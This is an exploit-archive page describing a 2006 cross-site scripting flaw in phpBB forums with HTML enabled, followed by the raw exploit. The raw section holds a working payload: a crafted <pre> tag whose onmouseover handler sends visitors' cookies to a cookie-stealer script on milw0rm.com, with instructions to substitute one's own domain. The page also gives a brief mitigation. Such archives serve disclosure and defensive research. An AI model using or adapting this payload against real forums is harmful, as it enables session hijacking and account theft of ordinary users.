header-logo
Suggest Exploit
vendor:
phpBB Forums
by:
threesixthousan
4.3
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: phpBB Forums
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

XSS Attack Vectors in phpBB Forums

As long as HTML is ON in the latest version of phpBB forums, several XSS attack vectors are possible. phpBB incorrectly filters in both messages and profiles, making cookie stealing, and other XSS attacks possible. The exploit leads to arbitrary JavaScript execution, which in turn can lead to HTML defacement. Use of the <pre> tag means that the cursor must pass it in the y direction only. e.g. the mouse only needs to cross a point horizontally equal to the link in order for the JavaScript to be executed.

Mitigation:

Ensure that HTML is disabled in phpBB forums and that all user input is properly sanitized.
Source

Exploit-DB raw data:

# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103 (https://www.exploit-db.com/exploits/1103/)
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan 

/*
As long as html is ON in the latest version of phpBB forums, 
several XSS attack vectors are possible. phpBB incorrectly 
filters in both messages and profiles, making cookie stealing, 
and other XSS attacks possible. the exploit leads to arbitary 
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y 
direction only. e.g. the mouse only needs to cross a point 
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >

[url]http://www.somesite.com/[/url]</pre>

# milw0rm.com [2006-01-29]

Navigation

Suggest Exploit

Services By CQR